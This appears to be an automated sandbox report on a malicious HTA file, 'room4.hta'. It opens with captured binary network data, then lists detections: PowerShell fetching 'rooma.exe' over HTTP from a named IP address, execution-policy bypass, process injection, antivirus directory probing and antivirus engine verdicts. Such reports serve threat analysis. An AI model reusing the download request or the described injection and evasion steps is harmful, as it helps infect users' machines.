;cIXJëÂ=×VñÍôc³£{Bsà«÷lE{ìTß)èI¤jÃæëßý;Z<@mèã'®ìøzélTPÈ!<3¦UM0 ¶±1ÀN¡o9 8¸VAn«9Bbíý]+ »'üjp¶ §>Ô0Á¤À¿FÝ{,lÊ×G/èpáQP ãbkþ¥¬&¡~Ð8 lâdõPþs½z²Ëi¡ïim!Ûîf ®ü2éà^ÃAE ÷#w2X )å{Þõc upÚ,/#ªÓìòf§hýÅÜ¹´k9Bñå)2p³SAÌ÷àÚ¦!1åÜQà8ôý§£) `¹lüOWÝËxoÆH=Ô"óÅløsNôïÉ2{nþ'\|Bj8Çl~Â«EÂgégR-íd²4%W½>ÀÞãP},\|°±ä3O "Âpi>èÑÖ®ÕÐk~ ,ß¨²ÃXm¼[ß/]DãË? îÿú×jÅJDÄNDäÁ@¿úíô 4TÄ@¦öXkT¥)X0ùÏÈð\PÜd%¼×;ÁÈp Y³ùV[6È]ÂÏØÀ8Èj3PúâbO±c½Äñ&.áÛÇ²<\|û&éUg{NªW³Û²µóâÚeI·Ó²@¬ù7whIVÃ{!G¯¯!ÞA¦\|´wØCôôK©PO»é
Data received	»Â>íDÖ²%·Z9¹ ZSÝ9KÑ<6!Ké¡ ¦aÉKñwäná÷õÿCòø¼µ^¸Éý\|¿7è÷EÔÅ¦øQU<`ïzµH%ÍÍ/nÄosR0ôèe;ðÕgëB\-ËY@>@ããd71£0é4ÊªYX[Fðo¡¡XJ}ÄÂtOA1$:
Data received	Ð(Ù(±ª ÓÚ©ûPÈzW}³DÄwî7þmQ}z7¹ÌìëÙðÌ 'Yæ·l`´AÏFcyÅøov!¥²^ò¶Ý&f+ð\öZªî9ÛæUÒhxÌ®[/Uì¥Ö.Öä»ÉQ%Õç½µarf^¹ä\|oþÈ^rÎ¸ c&»z¨à!µíÜìÈjSñ

Poweshell is sending data to a remote host (1 event)

Data sent

GET /room/rooma.exe HTTP/1.1 Host: 20.86.128.223 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 24, 2024, 9:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

20.86.128.223

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file	C:\Users\test22\AppData\Local\AVG\Browser\User Data

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\rooma.exe

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2308 manipulating memory of non-child process 1888
NtMapViewOfSection May 24, 2024, 9:37 a.m.	section_handle: 0x0000004c process_identifier: 1888 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x03b50000 allocation_type: 0 () section_offset: 0 view_size: 7155712 process_handle: 0x00000050	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send May 24, 2024, 9:37 a.m.	buffer: GET /room/rooma.exe HTTP/1.1 Host: 20.86.128.223 Connection: Keep-Alive socket: 1436 sent: 77	1	77	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2308 called NtSetContextThread to modify thread in remote process 2424
NtSetContextThread May 24, 2024, 9:37 a.m.	registers.eip: 2005598660 registers.esp: 2686696 registers.edi: 0 registers.eax: 562304 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000064 process_identifier: 2424	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\rooma.exe
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\rooma.exe"

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.Script.Valyria.a!c
Cynet	Malicious (score: 99)
Skyhigh	HTA/Downloader.f
McAfee	HTA/Downloader.f
VIPRE	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBS/Agent.QVR
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Win32.Outbreak
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
Kingsoft	Win32.Infected.AutoInfector.a
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
Tencent	Script.Trojan-Downloader.Generic.Ymhl
MAX	malware (ai score=88)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Roaming\rooma.exe

room4.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All